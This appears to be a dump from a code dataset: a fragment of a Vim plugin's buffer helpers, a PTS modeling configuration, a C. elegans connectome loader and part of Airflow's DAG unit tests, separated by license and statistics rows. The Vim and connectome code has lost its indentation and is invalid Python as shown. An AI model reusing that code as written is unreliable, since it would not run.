line_end_num, column_end_num = LineAndColumnNumbersClamped(line_end_num,
column_end_num)
if not column_end_num:
return GetIntValue(
"matchadd('{0}', '\%{1}l\%{2}c')".format(group, line_num, column_num))
else:
return GetIntValue(
"matchadd('{0}', '\%{1}l\%{2}c\_.\\{{-}}\%{3}l\%{4}c')".format(
group, line_num, column_num, line_end_num, column_end_num))
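# Usage sketch (illustrative positions, not taken from the plugin itself):
#   AddDiagnosticSyntaxMatch(10, 5)                          # mark a single error position
#   AddDiagnosticSyntaxMatch(10, 5, 10, 12, is_error=False)  # mark a warning range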
def LineAndColumnNumbersClamped(line_num, column_num):
new_line_num = line_num
new_column_num = column_num
max_line = len(vim.current.buffer)
if line_num and line_num > max_line:
new_line_num = max_line
max_column = len(vim.current.buffer[new_line_num - 1])
if column_num and column_num > max_column:
new_column_num = max_column
return new_line_num, new_column_num
def GotoOpenedBuffer(filename, line, column):
filepath = os.path.realpath(filename)
for tab in vim.tabpages:
for win in tab.windows:
if win.buffer.name == filepath:
vim.current.tabpage = tab
vim.current.window = win
vim.current.window.cursor = (line, column - 1)
# Center the screen on the jumped-to location
vim.command('normal! zz')
return True
return False
def GotoBuffer(filename, line, column):
# Add an entry to the jumplist
vim.command("normal! m'")
if filename != CurrentBufferFileName():
if GotoOpenedBuffer(filename, line, column):
return
buf = vim.current.buffer;
usable = not buf.options['modified'] or buf.options['bufhidden']
if usable:
command = 'edit'
else:
command = 'split'
vim.command('keepjumps {0} {1}'.format(command, filename.replace( ' ' , r'\ ' )))
vim.current.window.cursor = (line, column - 1)
# Center the screen on the jumped-to location
vim.command('normal! zz')
| bsd-3-clause | -5,430,061,958,010,127,000 | 28.83871 | 109 | 0.658069 | false |
SKIRT/PTS | modeling/config/expand.py | 1 | 3493 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
# Import the relevant PTS classes and modules
from pts.core.remote.host import find_host_ids
from pts.modeling.core.environment import load_modeling_environment_cwd
from pts.modeling.config.component import definition
# -----------------------------------------------------------------
# Copy the definition
definition = definition.copy()
# -----------------------------------------------------------------
# Set the modeling path
environment = load_modeling_environment_cwd()
runs = environment.fitting_runs
# -----------------------------------------------------------------
# Remote hosts
all_host_ids = find_host_ids()
has_remotes = len(all_host_ids) > 0
# -----------------------------------------------------------------
# The fitting run for which to explore the parameter space
if runs.empty: raise RuntimeError("No fitting runs are present")
elif runs.has_single: definition.add_fixed("run", "name of the fitting run", runs.single_name)
else: definition.add_required("run", "string", "name of the fitting run", choices=runs.names)
# Generation name
definition.add_required("generation", "string", "generation name")
# -----------------------------------------------------------------
# Parameters in which to expand
definition.add_required("parameters", "string_list", "parameters for which to expand the range") # choices are supposed to be the free parameters of a fitting run
definition.add_required("direction", "string_or_string_string_dictionary", "direction in which to expand") #choices=directions)
definition.add_required("npoints", "integer_or_string_integer_dictionary", "number of grid points to add")
# -----------------------------------------------------------------
# Remote or local execution
#if has_remotes: definition.add_positional_optional("remotes", "string_list", "remote hosts to use", default=environment.modeling_configuration.fitting_host_ids, choices=all_host_ids)
#else: definition.add_fixed("remotes", [])
definition.add_positional_optional("host", "host", "remote host to use")
definition.add_flag("local", "run everything locally")
# -----------------------------------------------------------------
# Options
definition.add_flag("attached", "run remote simulations in attached mode")
definition.add_flag("group", "group simulations in larger jobs")
definition.add_optional("walltime", "real", "the preferred walltime per job (for schedulers)")
# -----------------------------------------------------------------
# Update flags
definition.add_flag("update_individuals", "update the individuals table", True)
definition.add_flag("update_parameters", "update the parameters table", True)
definition.add_flag("update_info", "update the generation info", True)
definition.add_flag("update_generations", "update the generations table", True)
# -----------------------------------------------------------------
# Parallelization
definition.add_optional("parallelization", "parallelization", "parallelization scheme for the simulations")
definition.add_optional("nnodes", "positive_integer", "number of computation nodes to use for the simulations")
# -----------------------------------------------------------------
| agpl-3.0 | 8,462,161,034,693,216,000 | 44.947368 | 183 | 0.579324 | false |
unidesigner/microcircuit | microcircuit/dataset/testconnectome001.py | 1 | 1589 | """ Retrieve C.elegans connectivity from Web and parse appropriately
"""
# see data/
# http://mit.edu/lrv/www/elegans/
from scipy.io import matlab
import os.path as op
import networkx as nx
import microcircuit.constants as const
from microcircuit.connectome import Connectome
mat = matlab.loadmat(op.join(op.dirname(op.abspath(__file__)), 'data', 'ConnOrdered_040903.mat'))
# Keys available in the loaded .mat file:
#   'A_init_t_ordered', '__header__', '__globals__', 'Q_sorted',
#   'Neuron_ordered', 'Ag_t_ordered', '__version__'
metadata = {'name': 'testconnectome001',
'neuronmap': {}}
for i,label in enumerate(mat['Neuron_ordered']):
metadata['neuronmap'][i+1] = {'name': label[0][0]}
gap = mat['Ag_t_ordered']
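# zero the nonzero diagonal (self-connection) entries of the raw gap-junction
# matrix, presumably so the resulting graph carries no self-loops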
gap[94,94]=0.0
gap[106,106]=0.0
gap[216,216]=0.0
graphgap = nx.from_numpy_matrix(gap.todense(), create_using=nx.DiGraph())
graphgap = nx.relabel_nodes(graphgap, (lambda x:x+1))
for u,v,d in graphgap.edges_iter(data=True):
d[const.CONNECTOME_ELECTRICAL_SYNAPSE] = d['weight']
del d['weight']
chem = mat['A_init_t_ordered']
graphchem = nx.from_numpy_matrix(chem.todense(), create_using=nx.DiGraph())
graphchem = nx.relabel_nodes(graphchem, (lambda x:x+1))
for u,v,d in graphchem.edges_iter(data=True):
d[const.CONNECTOME_CHEMICAL_SYNAPSE] = d['weight']
del d['weight']
# TODO: problem with merge
for u,v,d in graphchem.edges_iter(data=True):
# TODO: how does it go over digraphs?
    # In addition to the gap-junction data already on graphgap, record the
    # chemical-synapse weight on the same edge.
graphgap.add_edge(u,v, {const.CONNECTOME_CHEMICAL_SYNAPSE:d[const.CONNECTOME_CHEMICAL_SYNAPSE]})
testconnectome = Connectome(metadata=metadata['neuronmap'], graph=graphgap) | bsd-3-clause | -2,411,533,777,501,062,000 | 29.576923 | 100 | 0.696665 | false |
apache/airflow | tests/models/test_dag.py | 2 | 74100 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import io
import logging
import os
import pickle
import re
import unittest
from contextlib import redirect_stdout
from datetime import timedelta
from tempfile import NamedTemporaryFile
from typing import Optional
from unittest import mock
from unittest.mock import patch
import pendulum
import pytest
from dateutil.relativedelta import relativedelta
from freezegun import freeze_time
from parameterized import parameterized
from airflow import models, settings
from airflow.configuration import conf
from airflow.decorators import task as task_decorator
from airflow.exceptions import AirflowException, DuplicateTaskIdFound
from airflow.models import DAG, DagModel, DagRun, DagTag, TaskFail, TaskInstance as TI
from airflow.models.baseoperator import BaseOperator
from airflow.models.dag import dag as dag_decorator
from airflow.models.dagparam import DagParam
from airflow.operators.bash import BashOperator
from airflow.operators.dummy import DummyOperator
from airflow.operators.subdag import SubDagOperator
from airflow.security import permissions
from airflow.timetables.simple import NullTimetable, OnceTimetable
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths
from airflow.utils.session import create_session, provide_session
from airflow.utils.state import State
from airflow.utils.timezone import datetime as datetime_tz
from airflow.utils.types import DagRunType
from airflow.utils.weight_rule import WeightRule
from tests.models import DEFAULT_DATE
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.db import clear_db_dags, clear_db_runs
from tests.test_utils.timetables import cron_timetable, delta_timetable
TEST_DATE = datetime_tz(2015, 1, 2, 0, 0)
class TestDag(unittest.TestCase):
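    """Unit tests for DAG construction defaults, scheduling helpers,
    database synchronisation and DagRun creation."""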
def setUp(self) -> None:
clear_db_runs()
clear_db_dags()
self.patcher_dag_code = patch.object(settings, "STORE_DAG_CODE", False)
self.patcher_dag_code.start()
def tearDown(self) -> None:
clear_db_runs()
clear_db_dags()
self.patcher_dag_code.stop()
@staticmethod
def _clean_up(dag_id: str):
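        """Remove DagRun, TaskInstance and TaskFail rows left behind for dag_id."""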
with create_session() as session:
session.query(DagRun).filter(DagRun.dag_id == dag_id).delete(synchronize_session=False)
session.query(TI).filter(TI.dag_id == dag_id).delete(synchronize_session=False)
session.query(TaskFail).filter(TaskFail.dag_id == dag_id).delete(synchronize_session=False)
@staticmethod
def _occur_before(a, b, list_):
"""
Assert that a occurs before b in the list.
"""
a_index = -1
b_index = -1
for i, e in enumerate(list_):
if e.task_id == a:
a_index = i
if e.task_id == b:
b_index = i
return 0 <= a_index < b_index
def test_params_not_passed_is_empty_dict(self):
"""
Test that when 'params' is _not_ passed to a new Dag, that the params
attribute is set to an empty dictionary.
"""
dag = models.DAG('test-dag')
assert isinstance(dag.params, dict)
assert 0 == len(dag.params)
def test_params_passed_and_params_in_default_args_no_override(self):
"""
Test that when 'params' exists as a key passed to the default_args dict
in addition to params being passed explicitly as an argument to the
dag, that the 'params' key of the default_args dict is merged with the
dict of the params argument.
"""
params1 = {'parameter1': 1}
params2 = {'parameter2': 2}
dag = models.DAG('test-dag', default_args={'params': params1}, params=params2)
params_combined = params1.copy()
params_combined.update(params2)
assert params_combined == dag.params
def test_dag_invalid_default_view(self):
"""
Test invalid `default_view` of DAG initialization
"""
with pytest.raises(AirflowException, match='Invalid values of dag.default_view: only support'):
models.DAG(dag_id='test-invalid-default_view', default_view='airflow')
def test_dag_default_view_default_value(self):
"""
Test `default_view` default value of DAG initialization
"""
dag = models.DAG(dag_id='test-default_default_view')
assert conf.get('webserver', 'dag_default_view').lower() == dag.default_view
def test_dag_invalid_orientation(self):
"""
Test invalid `orientation` of DAG initialization
"""
with pytest.raises(AirflowException, match='Invalid values of dag.orientation: only support'):
models.DAG(dag_id='test-invalid-orientation', orientation='airflow')
def test_dag_orientation_default_value(self):
"""
Test `orientation` default value of DAG initialization
"""
dag = models.DAG(dag_id='test-default_orientation')
assert conf.get('webserver', 'dag_orientation') == dag.orientation
def test_dag_as_context_manager(self):
"""
Test DAG as a context manager.
When used as a context manager, Operators are automatically added to
the DAG (unless they specify a different DAG)
"""
dag = DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
dag2 = DAG('dag2', start_date=DEFAULT_DATE, default_args={'owner': 'owner2'})
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2', dag=dag2)
assert op1.dag is dag
assert op1.owner == 'owner1'
assert op2.dag is dag2
assert op2.owner == 'owner2'
with dag2:
op3 = DummyOperator(task_id='op3')
assert op3.dag is dag2
assert op3.owner == 'owner2'
with dag:
with dag2:
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
assert op4.dag is dag2
assert op5.dag is dag
assert op4.owner == 'owner2'
assert op5.owner == 'owner1'
with DAG('creating_dag_in_cm', start_date=DEFAULT_DATE) as dag:
DummyOperator(task_id='op6')
assert dag.dag_id == 'creating_dag_in_cm'
assert dag.tasks[0].task_id == 'op6'
with dag:
with dag:
op7 = DummyOperator(task_id='op7')
op8 = DummyOperator(task_id='op8')
op9 = DummyOperator(task_id='op8')
op9.dag = dag2
assert op7.dag == dag
assert op8.dag == dag
assert op9.dag == dag2
def test_dag_topological_sort_include_subdag_tasks(self):
child_dag = DAG(
'parent_dag.child_dag',
schedule_interval='@daily',
start_date=DEFAULT_DATE,
)
with child_dag:
DummyOperator(task_id='a_child')
DummyOperator(task_id='b_child')
parent_dag = DAG(
'parent_dag',
schedule_interval='@daily',
start_date=DEFAULT_DATE,
)
# a_parent -> child_dag -> (a_child | b_child) -> b_parent
with parent_dag:
op1 = DummyOperator(task_id='a_parent')
op2 = SubDagOperator(task_id='child_dag', subdag=child_dag)
op3 = DummyOperator(task_id='b_parent')
op1 >> op2 >> op3
topological_list = parent_dag.topological_sort(include_subdag_tasks=True)
assert self._occur_before('a_parent', 'child_dag', topological_list)
assert self._occur_before('child_dag', 'a_child', topological_list)
assert self._occur_before('child_dag', 'b_child', topological_list)
assert self._occur_before('a_child', 'b_parent', topological_list)
assert self._occur_before('b_child', 'b_parent', topological_list)
def test_dag_topological_sort1(self):
dag = DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
# A -> B
# A -> C -> D
# ordered: B, D, C, A or D, B, C, A or D, C, B, A
with dag:
op1 = DummyOperator(task_id='A')
op2 = DummyOperator(task_id='B')
op3 = DummyOperator(task_id='C')
op4 = DummyOperator(task_id='D')
op1.set_upstream([op2, op3])
op3.set_upstream(op4)
topological_list = dag.topological_sort()
logging.info(topological_list)
tasks = [op2, op3, op4]
assert topological_list[0] in tasks
tasks.remove(topological_list[0])
assert topological_list[1] in tasks
tasks.remove(topological_list[1])
assert topological_list[2] in tasks
tasks.remove(topological_list[2])
assert topological_list[3] == op1
def test_dag_topological_sort2(self):
dag = DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
# C -> (A u B) -> D
# C -> E
# ordered: E | D, A | B, C
with dag:
op1 = DummyOperator(task_id='A')
op2 = DummyOperator(task_id='B')
op3 = DummyOperator(task_id='C')
op4 = DummyOperator(task_id='D')
op5 = DummyOperator(task_id='E')
op1.set_downstream(op3)
op2.set_downstream(op3)
op1.set_upstream(op4)
op2.set_upstream(op4)
op5.set_downstream(op3)
topological_list = dag.topological_sort()
logging.info(topological_list)
set1 = [op4, op5]
assert topological_list[0] in set1
set1.remove(topological_list[0])
set2 = [op1, op2]
set2.extend(set1)
assert topological_list[1] in set2
set2.remove(topological_list[1])
assert topological_list[2] in set2
set2.remove(topological_list[2])
assert topological_list[3] in set2
assert topological_list[4] == op3
def test_dag_topological_sort_dag_without_tasks(self):
dag = DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
assert () == dag.topological_sort()
def test_dag_naive_start_date_string(self):
DAG('DAG', default_args={'start_date': '2019-06-01'})
def test_dag_naive_start_end_dates_strings(self):
DAG('DAG', default_args={'start_date': '2019-06-01', 'end_date': '2019-06-05'})
def test_dag_start_date_propagates_to_end_date(self):
"""
Tests that a start_date string with a timezone and an end_date string without a timezone
are accepted and that the timezone from the start carries over the end
This test is a little indirect, it works by setting start and end equal except for the
timezone and then testing for equality after the DAG construction. They'll be equal
only if the same timezone was applied to both.
An explicit check the `tzinfo` attributes for both are the same is an extra check.
"""
dag = DAG(
'DAG', default_args={'start_date': '2019-06-05T00:00:00+05:00', 'end_date': '2019-06-05T00:00:00'}
)
assert dag.default_args['start_date'] == dag.default_args['end_date']
assert dag.default_args['start_date'].tzinfo == dag.default_args['end_date'].tzinfo
def test_dag_naive_default_args_start_date(self):
dag = DAG('DAG', default_args={'start_date': datetime.datetime(2018, 1, 1)})
assert dag.timezone == settings.TIMEZONE
dag = DAG('DAG', start_date=datetime.datetime(2018, 1, 1))
assert dag.timezone == settings.TIMEZONE
def test_dag_none_default_args_start_date(self):
"""
Tests if a start_date of None in default_args
works.
"""
dag = DAG('DAG', default_args={'start_date': None})
assert dag.timezone == settings.TIMEZONE
def test_dag_task_priority_weight_total(self):
width = 5
depth = 5
weight = 5
pattern = re.compile('stage(\\d*).(\\d*)')
# Fully connected parallel tasks. i.e. every task at each parallel
# stage is dependent on every task in the previous stage.
# Default weight should be calculated using downstream descendants
with DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}) as dag:
pipeline = [
[DummyOperator(task_id=f'stage{i}.{j}', priority_weight=weight) for j in range(0, width)]
for i in range(0, depth)
]
for i, stage in enumerate(pipeline):
if i == 0:
continue
for current_task in stage:
for prev_task in pipeline[i - 1]:
current_task.set_upstream(prev_task)
for task in dag.task_dict.values():
match = pattern.match(task.task_id)
task_depth = int(match.group(1))
# the sum of each stages after this task + itself
correct_weight = ((depth - (task_depth + 1)) * width + 1) * weight
calculated_weight = task.priority_weight_total
assert calculated_weight == correct_weight
def test_dag_task_priority_weight_total_using_upstream(self):
# Same test as above except use 'upstream' for weight calculation
weight = 3
width = 5
depth = 5
pattern = re.compile('stage(\\d*).(\\d*)')
with DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}) as dag:
pipeline = [
[
DummyOperator(
task_id=f'stage{i}.{j}',
priority_weight=weight,
weight_rule=WeightRule.UPSTREAM,
)
for j in range(0, width)
]
for i in range(0, depth)
]
for i, stage in enumerate(pipeline):
if i == 0:
continue
for current_task in stage:
for prev_task in pipeline[i - 1]:
current_task.set_upstream(prev_task)
for task in dag.task_dict.values():
match = pattern.match(task.task_id)
task_depth = int(match.group(1))
# the sum of each stages after this task + itself
correct_weight = (task_depth * width + 1) * weight
calculated_weight = task.priority_weight_total
assert calculated_weight == correct_weight
def test_dag_task_priority_weight_total_using_absolute(self):
# Same test as above except use 'absolute' for weight calculation
weight = 10
width = 5
depth = 5
with DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}) as dag:
pipeline = [
[
DummyOperator(
task_id=f'stage{i}.{j}',
priority_weight=weight,
weight_rule=WeightRule.ABSOLUTE,
)
for j in range(0, width)
]
for i in range(0, depth)
]
for i, stage in enumerate(pipeline):
if i == 0:
continue
for current_task in stage:
for prev_task in pipeline[i - 1]:
current_task.set_upstream(prev_task)
for task in dag.task_dict.values():
# the sum of each stages after this task + itself
correct_weight = weight
calculated_weight = task.priority_weight_total
assert calculated_weight == correct_weight
def test_dag_task_invalid_weight_rule(self):
# Test if we enter an invalid weight rule
with DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}):
with pytest.raises(AirflowException):
DummyOperator(task_id='should_fail', weight_rule='no rule')
def test_get_num_task_instances(self):
test_dag_id = 'test_get_num_task_instances_dag'
test_task_id = 'task_1'
test_dag = DAG(dag_id=test_dag_id, start_date=DEFAULT_DATE)
test_task = DummyOperator(task_id=test_task_id, dag=test_dag)
ti1 = TI(task=test_task, execution_date=DEFAULT_DATE)
ti1.state = None
ti2 = TI(task=test_task, execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti2.state = State.RUNNING
ti3 = TI(task=test_task, execution_date=DEFAULT_DATE + datetime.timedelta(days=2))
ti3.state = State.QUEUED
ti4 = TI(task=test_task, execution_date=DEFAULT_DATE + datetime.timedelta(days=3))
ti4.state = State.RUNNING
session = settings.Session()
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.merge(ti4)
session.commit()
assert 0 == DAG.get_num_task_instances(test_dag_id, ['fakename'], session=session)
assert 4 == DAG.get_num_task_instances(test_dag_id, [test_task_id], session=session)
assert 4 == DAG.get_num_task_instances(test_dag_id, ['fakename', test_task_id], session=session)
assert 1 == DAG.get_num_task_instances(test_dag_id, [test_task_id], states=[None], session=session)
assert 2 == DAG.get_num_task_instances(
test_dag_id, [test_task_id], states=[State.RUNNING], session=session
)
assert 3 == DAG.get_num_task_instances(
test_dag_id, [test_task_id], states=[None, State.RUNNING], session=session
)
assert 4 == DAG.get_num_task_instances(
test_dag_id, [test_task_id], states=[None, State.QUEUED, State.RUNNING], session=session
)
session.close()
def test_user_defined_filters(self):
def jinja_udf(name):
return f'Hello {name}'
dag = models.DAG('test-dag', start_date=DEFAULT_DATE, user_defined_filters={"hello": jinja_udf})
jinja_env = dag.get_template_env()
assert 'hello' in jinja_env.filters
assert jinja_env.filters['hello'] == jinja_udf
def test_resolve_template_files_value(self):
with NamedTemporaryFile(suffix='.template') as f:
f.write(b'{{ ds }}')
f.flush()
template_dir = os.path.dirname(f.name)
template_file = os.path.basename(f.name)
with DAG('test-dag', start_date=DEFAULT_DATE, template_searchpath=template_dir):
task = DummyOperator(task_id='op1')
task.test_field = template_file
task.template_fields = ('test_field',)
task.template_ext = ('.template',)
task.resolve_template_files()
assert task.test_field == '{{ ds }}'
def test_resolve_template_files_list(self):
with NamedTemporaryFile(suffix='.template') as f:
f.write(b'{{ ds }}')
f.flush()
template_dir = os.path.dirname(f.name)
template_file = os.path.basename(f.name)
with DAG('test-dag', start_date=DEFAULT_DATE, template_searchpath=template_dir):
task = DummyOperator(task_id='op1')
task.test_field = [template_file, 'some_string']
task.template_fields = ('test_field',)
task.template_ext = ('.template',)
task.resolve_template_files()
assert task.test_field == ['{{ ds }}', 'some_string']
def test_following_previous_schedule(self):
"""
Make sure DST transitions are properly observed
"""
local_tz = pendulum.timezone('Europe/Zurich')
start = local_tz.convert(datetime.datetime(2018, 10, 28, 2, 55), dst_rule=pendulum.PRE_TRANSITION)
assert start.isoformat() == "2018-10-28T02:55:00+02:00", "Pre-condition: start date is in DST"
utc = timezone.convert_to_utc(start)
dag = DAG('tz_dag', start_date=start, schedule_interval='*/5 * * * *')
_next = dag.following_schedule(utc)
next_local = local_tz.convert(_next)
assert _next.isoformat() == "2018-10-28T01:00:00+00:00"
assert next_local.isoformat() == "2018-10-28T02:00:00+01:00"
prev = dag.previous_schedule(utc)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-10-28T02:50:00+02:00"
prev = dag.previous_schedule(_next)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-10-28T02:55:00+02:00"
assert prev == utc
def test_following_previous_schedule_daily_dag_cest_to_cet(self):
"""
Make sure DST transitions are properly observed
"""
local_tz = pendulum.timezone('Europe/Zurich')
start = local_tz.convert(datetime.datetime(2018, 10, 27, 3), dst_rule=pendulum.PRE_TRANSITION)
utc = timezone.convert_to_utc(start)
dag = DAG('tz_dag', start_date=start, schedule_interval='0 3 * * *')
prev = dag.previous_schedule(utc)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-10-26T03:00:00+02:00"
assert prev.isoformat() == "2018-10-26T01:00:00+00:00"
_next = dag.following_schedule(utc)
next_local = local_tz.convert(_next)
assert next_local.isoformat() == "2018-10-28T03:00:00+01:00"
assert _next.isoformat() == "2018-10-28T02:00:00+00:00"
prev = dag.previous_schedule(_next)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-10-27T03:00:00+02:00"
assert prev.isoformat() == "2018-10-27T01:00:00+00:00"
def test_following_previous_schedule_daily_dag_cet_to_cest(self):
"""
Make sure DST transitions are properly observed
"""
local_tz = pendulum.timezone('Europe/Zurich')
start = local_tz.convert(datetime.datetime(2018, 3, 25, 2), dst_rule=pendulum.PRE_TRANSITION)
utc = timezone.convert_to_utc(start)
dag = DAG('tz_dag', start_date=start, schedule_interval='0 3 * * *')
prev = dag.previous_schedule(utc)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-03-24T03:00:00+01:00"
assert prev.isoformat() == "2018-03-24T02:00:00+00:00"
_next = dag.following_schedule(utc)
next_local = local_tz.convert(_next)
assert next_local.isoformat() == "2018-03-25T03:00:00+02:00"
assert _next.isoformat() == "2018-03-25T01:00:00+00:00"
prev = dag.previous_schedule(_next)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-03-24T03:00:00+01:00"
assert prev.isoformat() == "2018-03-24T02:00:00+00:00"
def test_following_schedule_relativedelta(self):
"""
Tests following_schedule a dag with a relativedelta schedule_interval
"""
dag_id = "test_schedule_dag_relativedelta"
delta = relativedelta(hours=+1)
dag = DAG(dag_id=dag_id, schedule_interval=delta)
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=TEST_DATE))
_next = dag.following_schedule(TEST_DATE)
assert _next.isoformat() == "2015-01-02T01:00:00+00:00"
_next = dag.following_schedule(_next)
assert _next.isoformat() == "2015-01-02T02:00:00+00:00"
def test_previous_schedule_datetime_timezone(self):
# Check that we don't get an AttributeError 'name' for self.timezone
start = datetime.datetime(2018, 3, 25, 2, tzinfo=datetime.timezone.utc)
dag = DAG('tz_dag', start_date=start, schedule_interval='@hourly')
when = dag.previous_schedule(start)
assert when.isoformat() == "2018-03-25T01:00:00+00:00"
def test_following_schedule_datetime_timezone(self):
# Check that we don't get an AttributeError 'name' for self.timezone
start = datetime.datetime(2018, 3, 25, 2, tzinfo=datetime.timezone.utc)
dag = DAG('tz_dag', start_date=start, schedule_interval='@hourly')
when = dag.following_schedule(start)
assert when.isoformat() == "2018-03-25T03:00:00+00:00"
def test_following_schedule_datetime_timezone_utc0530(self):
# Check that we don't get an AttributeError 'name' for self.timezone
class UTC0530(datetime.tzinfo):
"""tzinfo derived concrete class named "+0530" with offset of 19800"""
# can be configured here
_offset = datetime.timedelta(seconds=19800)
_dst = datetime.timedelta(0)
_name = "+0530"
def utcoffset(self, dt):
return self.__class__._offset
def dst(self, dt):
return self.__class__._dst
def tzname(self, dt):
return self.__class__._name
start = datetime.datetime(2018, 3, 25, 10, tzinfo=UTC0530())
dag = DAG('tz_dag', start_date=start, schedule_interval='@hourly')
when = dag.following_schedule(start)
assert when.isoformat() == "2018-03-25T05:30:00+00:00"
def test_dagtag_repr(self):
clear_db_dags()
dag = DAG('dag-test-dagtag', start_date=DEFAULT_DATE, tags=['tag-1', 'tag-2'])
dag.sync_to_db()
with create_session() as session:
assert {'tag-1', 'tag-2'} == {
repr(t) for t in session.query(DagTag).filter(DagTag.dag_id == 'dag-test-dagtag').all()
}
def test_bulk_write_to_db(self):
clear_db_dags()
dags = [DAG(f'dag-bulk-sync-{i}', start_date=DEFAULT_DATE, tags=["test-dag"]) for i in range(0, 4)]
with assert_queries_count(5):
DAG.bulk_write_to_db(dags)
with create_session() as session:
assert {'dag-bulk-sync-0', 'dag-bulk-sync-1', 'dag-bulk-sync-2', 'dag-bulk-sync-3'} == {
row[0] for row in session.query(DagModel.dag_id).all()
}
assert {
('dag-bulk-sync-0', 'test-dag'),
('dag-bulk-sync-1', 'test-dag'),
('dag-bulk-sync-2', 'test-dag'),
('dag-bulk-sync-3', 'test-dag'),
} == set(session.query(DagTag.dag_id, DagTag.name).all())
for row in session.query(DagModel.last_parsed_time).all():
assert row[0] is not None
# Re-sync should do fewer queries
with assert_queries_count(4):
DAG.bulk_write_to_db(dags)
with assert_queries_count(4):
DAG.bulk_write_to_db(dags)
# Adding tags
for dag in dags:
dag.tags.append("test-dag2")
with assert_queries_count(5):
DAG.bulk_write_to_db(dags)
with create_session() as session:
assert {'dag-bulk-sync-0', 'dag-bulk-sync-1', 'dag-bulk-sync-2', 'dag-bulk-sync-3'} == {
row[0] for row in session.query(DagModel.dag_id).all()
}
assert {
('dag-bulk-sync-0', 'test-dag'),
('dag-bulk-sync-0', 'test-dag2'),
('dag-bulk-sync-1', 'test-dag'),
('dag-bulk-sync-1', 'test-dag2'),
('dag-bulk-sync-2', 'test-dag'),
('dag-bulk-sync-2', 'test-dag2'),
('dag-bulk-sync-3', 'test-dag'),
('dag-bulk-sync-3', 'test-dag2'),
} == set(session.query(DagTag.dag_id, DagTag.name).all())
# Removing tags
for dag in dags:
dag.tags.remove("test-dag")
with assert_queries_count(5):
DAG.bulk_write_to_db(dags)
with create_session() as session:
assert {'dag-bulk-sync-0', 'dag-bulk-sync-1', 'dag-bulk-sync-2', 'dag-bulk-sync-3'} == {
row[0] for row in session.query(DagModel.dag_id).all()
}
assert {
('dag-bulk-sync-0', 'test-dag2'),
('dag-bulk-sync-1', 'test-dag2'),
('dag-bulk-sync-2', 'test-dag2'),
('dag-bulk-sync-3', 'test-dag2'),
} == set(session.query(DagTag.dag_id, DagTag.name).all())
for row in session.query(DagModel.last_parsed_time).all():
assert row[0] is not None
def test_bulk_write_to_db_max_active_runs(self):
"""
Test that DagModel.next_dagrun_create_after is set to NULL when the dag cannot be created due to max
active runs being hit.
"""
dag = DAG(dag_id='test_scheduler_verify_max_active_runs', start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
session = settings.Session()
dag.clear()
DAG.bulk_write_to_db([dag], session)
model = session.query(DagModel).get((dag.dag_id,))
period_end = dag.following_schedule(DEFAULT_DATE)
assert model.next_dagrun == DEFAULT_DATE
assert model.next_dagrun_create_after == period_end
dr = dag.create_dagrun(
state=State.RUNNING,
execution_date=model.next_dagrun,
run_type=DagRunType.SCHEDULED,
session=session,
)
assert dr is not None
DAG.bulk_write_to_db([dag])
model = session.query(DagModel).get((dag.dag_id,))
assert model.next_dagrun == period_end
# We signal "at max active runs" by saying this run is never eligible to be created
assert model.next_dagrun_create_after is None
def test_sync_to_db(self):
dag = DAG(
'dag',
start_date=DEFAULT_DATE,
)
with dag:
DummyOperator(task_id='task', owner='owner1')
subdag = DAG(
'dag.subtask',
start_date=DEFAULT_DATE,
)
# parent_dag and is_subdag was set by DagBag. We don't use DagBag, so this value is not set.
subdag.parent_dag = dag
subdag.is_subdag = True
SubDagOperator(task_id='subtask', owner='owner2', subdag=subdag)
session = settings.Session()
dag.sync_to_db(session=session)
orm_dag = session.query(DagModel).filter(DagModel.dag_id == 'dag').one()
assert set(orm_dag.owners.split(', ')) == {'owner1', 'owner2'}
assert orm_dag.is_active
assert orm_dag.default_view is not None
assert orm_dag.default_view == conf.get('webserver', 'dag_default_view').lower()
assert orm_dag.safe_dag_id == 'dag'
orm_subdag = session.query(DagModel).filter(DagModel.dag_id == 'dag.subtask').one()
assert set(orm_subdag.owners.split(', ')) == {'owner1', 'owner2'}
assert orm_subdag.is_active
assert orm_subdag.safe_dag_id == 'dag__dot__subtask'
assert orm_subdag.fileloc == orm_dag.fileloc
session.close()
def test_sync_to_db_default_view(self):
dag = DAG(
'dag',
start_date=DEFAULT_DATE,
default_view="graph",
)
with dag:
DummyOperator(task_id='task', owner='owner1')
SubDagOperator(
task_id='subtask',
owner='owner2',
subdag=DAG(
'dag.subtask',
start_date=DEFAULT_DATE,
),
)
